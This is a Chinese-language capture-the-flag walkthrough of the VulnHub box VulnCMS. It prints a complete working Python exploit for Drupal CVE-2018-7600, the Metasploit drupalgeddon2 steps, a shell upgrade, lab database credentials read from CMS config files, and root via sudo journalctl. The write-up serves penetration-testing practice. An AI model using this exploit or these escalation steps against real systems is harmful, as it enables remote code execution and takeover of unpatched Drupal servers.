vulnhub靶机练习-VULNCMS

靶机下载地址:https://www.vulnhub.com/entry/vulncms-1,710/

Description

This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.

Hint: Proceed in the given order :P

信息搜集

nmap -sV -sC -A 192.168.169.143 发现开放了22 80 5000 8081 9001端口

image-20210824110046652

其中80是w3.css 5000端口是WordPress 8081端口是Joomla 9001端口是drupal,经过测试,9001端口的下的drupal可以利用

漏洞利用

这里drupal有个RCE,我直接丢上Exp了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
                    by poisoning the recover password form (user/password) and triggering it with
                    the upload file via ajax (/file/ajax).
                    ''')
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, function, command, proxy):
  requests.packages.urllib3.disable_warnings()
  proxies = {'http': proxy, 'https': proxy}
  print('[*] Poisoning a form and including it in cache.')
  get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
  post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
  r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  try:
    form = soup.find('form', {'id': 'user-pass'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/name/#value/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('=============================================================================')
  print ('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
  print ('|                              by pimps                                     |')
  print ('=============================================================================\n')

  args = get_args() # get the cl args
  pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
  main()

这里可以直接使用msf,可以成功获取到一个meterpreter

1
2
3
4
5
6
7
8
use exploit/multi/handler
search drupal
exploit/unix/webapp/drupal_drupalgeddon2
set lport xxx
set lhost xxx
set rport xxx
set rhost xxx
run

python3 -c ‘import pty; pty.spawn(“/bin/bash”);’ 切换成交互式shell

查看/etc/passwd文件 cat /etc/passwd,发现有两个用户,elliot,tyrell,应该是要获取到这两个用户,我们去翻翻三个cms的数据库吧

drupal:/sites/default/settings.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal_db',
      'username' => 'drupal_admin',
      'password' => 'p@$$_C!rUP@!_cM5',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

joomla:configuration.php

1
2
3
4
public $host = 'localhost';
      public $user = 'joomla_admin';
      public $password = 'j00m1_@_dBpA$$';

worepress:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_admin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

额,我这里数据库连接不上,这第一个flag暂时找不出来,因为爆破账号密码的话,正确密码在数据库里

后渗透提权

虽然第一个flag做不出来,第二个还是可以的,我们可以发现在/drupal/misc有个tyrell.pass,里面有tyrell的账号密码

image-20210824113603240

使用ssh登陆 ssh tyrell@192.168.169.143

登录成功之后使用sudo -l命令发现/bin/journalctl可以进行利用;
附上漏洞查询连接https://gtfobins.github.io/

image-20210824113659688

输入完命令即可获取root权限

1
2
sudo journalctl
!/bin/sh

image-20210824113828706